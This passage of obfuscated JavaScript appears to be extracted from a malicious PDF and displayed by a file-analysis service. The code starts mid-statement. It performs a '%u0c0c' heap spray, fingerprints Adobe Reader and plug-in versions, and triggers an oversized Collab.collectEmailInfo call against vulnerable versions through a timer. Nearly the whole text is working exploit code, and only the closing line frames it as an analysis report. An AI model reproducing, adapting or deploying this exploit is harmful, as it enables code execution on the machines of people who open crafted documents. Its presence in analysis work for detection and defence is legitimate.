0x400000;var Py_pmn = Ga_36I6Yh2_D.length 2;var lG_5ba = hu7G4T3_KFB1nxI - (Py_pmn+0x38);Bq72255P = Y_2y5u__31515(Bq72255P, lG_5ba);var g_h_Pc_f8Pi0 = (L28H_t - 0x400000)/hu7G4T3_KFB1nxI;for (var pCnE_J_T0u_A = 0; pCnE_J_T0u_A < g_h_Pc_f8Pi0; pCnE_J_T0u_A++) {pdaoXx_3[pCnE_J_T0u_A] = Bq72255P + Ga_36I6Yh2_D;}}function k020Xj_r5_P7h(){var c4GytAJf53 = "";for (uVQ_VT4G_3 = 0; uVQ_VT4G_3 < 12; uVQ_VT4G_3++) {c4GytAJf53 += unescape("%u0c0c%u0c0c");}var R_og6_1G2U0 = "";for (uVQ_VT4G_3 = 0; uVQ_VT4G_3 < 750; uVQ_VT4G_3++) {R_og6_1G2U0 += c4GytAJf53;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: R_og6_1G2U0});app.clearTimeOut(mOW2_OPCx4__Cv);}function VL_y08L_6gA5q(Ie8WCO___0Lg1WG){var k0_nRY = mOW2_OPCx4__Cv;if ((Ie8WCO___0Lg1WG >= 8 && Ie8WCO___0Lg1WG < 8.11) \|\| Ie8WCO___0Lg1WG < 7.1) {i_Q__e7_R_ML(23, "%u0c0c%u0c0c", Ie8WCO___0Lg1WG);k020Xj_r5_P7h();}if (k0_nRY) {app.clearTimeOut(k0_nRY);}}var R_15_2n_e_X = 0;var UF1cvmoLvv = app.plugIns;for (var g_R3Vo_DX_C = 0; g_R3Vo_DX_C < UF1cvmoLvv.length; g_R3Vo_DX_C++) {var ERDV7T = UF1cvmoLvv[g_R3Vo_DX_C].version;if (ERDV7T > R_15_2n_e_X) { R_15_2n_e_X = ERDV7T; }}if (app.viewerVersion == 9.103 && R_15_2n_e_X < 9.13) {R_15_2n_e_X = 9.13;}app.D5___TC_Sd0L_4F = VL_y08L_6gA5q;mOW2_OPCx4__Cv = app.setTimeOut("app.D5___TC_Sd0L_4F(" + R_15_2n_e_X.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.